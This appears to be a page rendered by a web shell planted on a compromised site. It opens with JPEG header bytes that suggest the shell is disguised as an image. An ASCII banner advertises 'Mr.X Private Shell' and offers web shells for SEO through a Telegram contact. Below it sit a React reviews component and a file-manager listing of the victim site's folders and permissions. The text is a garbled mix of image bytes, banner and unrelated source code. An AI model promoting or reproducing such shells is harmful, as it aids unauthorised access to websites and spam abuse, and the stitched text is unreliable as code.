����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import ReviewNotifications from './components/notification';
import { useSettings } from './hooks/use-settings';
import UserFeedbackForm from './layouts/user-feedback-form';
const ReviewsApp = () => {
const { notificationMessage, notificationType } = useSettings();
return (
<>
<UserFeedbackForm />
<ReviewNotifications
message={notificationMessage}
type={notificationType}
/>
</>
);
};
export default ReviewsApp;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| api | Folder | 0755 |
|
|
| components | Folder | 0755 |
|
|
| hooks | Folder | 0755 |
|
|
| icons | Folder | 0755 |
|
|
| layouts | Folder | 0755 |
|
|
| app.js | File | 441 B | 0644 |
|
| constants.js | File | 115 B | 0644 |
|
| reviews.js | File | 933 B | 0644 |
|